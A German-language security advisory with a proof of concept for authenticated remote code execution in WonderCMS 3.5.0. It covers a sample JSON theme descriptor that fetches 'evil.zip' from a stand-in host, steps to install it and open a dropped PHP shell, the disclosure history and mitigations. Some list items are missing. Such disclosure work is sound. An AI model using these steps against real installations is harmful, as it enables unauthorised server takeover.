
Authentifizierter RCE-Exploit für WonderCMS 3.5.0 durch bösartige Theme-Installation. Enthält Schwachstellenmechanismen, PoC und Minderungsanleitung für Sicherheitstests und Schulung.
In WonderCMS v3.5.0 existiert eine authentifizierte Remote-Code-Ausführungs-Schwachstelle (RCE).
Das Problem liegt in der Art und Weise, wie die Anwendung Remote-Theme/Modul-Installationen über JSON-Deskriptoren handhabt. Wenn ein Administrator eine entfernte JSON-Datei mit Verweis auf ein ZIP-Archiv einreicht, werden deren Inhalte in ein webbasiertes Verzeichnis extrahiert (z. B. /themes/). Enthält das ZIP eine PHP-Datei, wird diese Datei über das Web zugänglich und kann ausgeführt werden.
Dieses Verhalten birgt ein RCE-Risiko aufgrund von:
Hinweis: Eine Administrator-Authentifizierung ist erforderlich, aber Standardinstallationen legen das Admin-Passwort öffentlich auf der Startseite offen, verwenden eine reine Passwort-Anmeldung und erzwingen keine strengen Authentifizierungskontrollen.
WonderCMS akzeptiert und versucht, Remote-Module/Themes zu installieren, wenn der eingereichte JSON-Deskriptor dem erwarteten wcms-modules.json-Format entspricht. Ein Deskriptor, der die Formatauswertung besteht (und auf ein ZIP-Archiv verweist), wird abgerufen und seine Archivinhalte werden ohne weitere Validierung der Dateitypen in ein webbasiertes Verzeichnis extrahiert (z. B. /themes/<name>/).
Beispiel-Deskriptor:
{
"themes": {
"SSRF": {
"name": "FAKE",
"repo": "https://example.com/",
"zip": "https://example.com/evil.zip",
"summary": "test",
"version": "1.0.0",
"image": "https://example.com/fake.png"
}
}
}
Warnung: Nicht auf Produktionssystemen ausführen. Nur autorisierte Testumgebungen verwenden.
Besorgen Sie sich das Admin-Passwort von der öffentlich zugänglichen Startseite einer standardmäßigen WonderCMS-Installation.
Melden Sie sich im Admin-Panel an.
Navigieren Sie zum Theme-Installationsbereich.
Geben Sie die URL zu einem schädlichen JSON-Deskriptor an (z. B. gehostet auf einem Angreifer-kontrollierten Server).
Starten Sie die Installation. Der Server wird:
Installieren Sie das heruntergeladene schädliche Theme.
Greifen Sie auf die extrahierte PHP-Shell zu (z. B. http://target.com/themes/<Theme_Name>/shell.php), um beliebige Befehle auszuführen.
(Hinweis: Führen Sie diese Schritte nur in einer kontrollierten Testumgebung durch. Das Ausnutzen dieser Schwachstelle in Live-Systemen ohne Autorisierung ist illegal.)
Die Schwachstelle wurde den WonderCMS-Maintainern im Juli 2025 gemeldet.
Die Maintainer bestätigten den Bericht, merkten jedoch an, dass dieses Verhalten aus ihrer Sicht für Administratoren akzeptabel sei.
Um die Gefährdung zu reduzieren:
themes/ oder plugins/ durch Serverkonfiguration.Diese Informationen werden zu Zwecken der defensiven Sicherheitsforschung und zu Bildungszwecken bereitgestellt. Holen Sie vor dem Testen oder Offenlegen von Schwachstellen stets die entsprechende Genehmigung ein.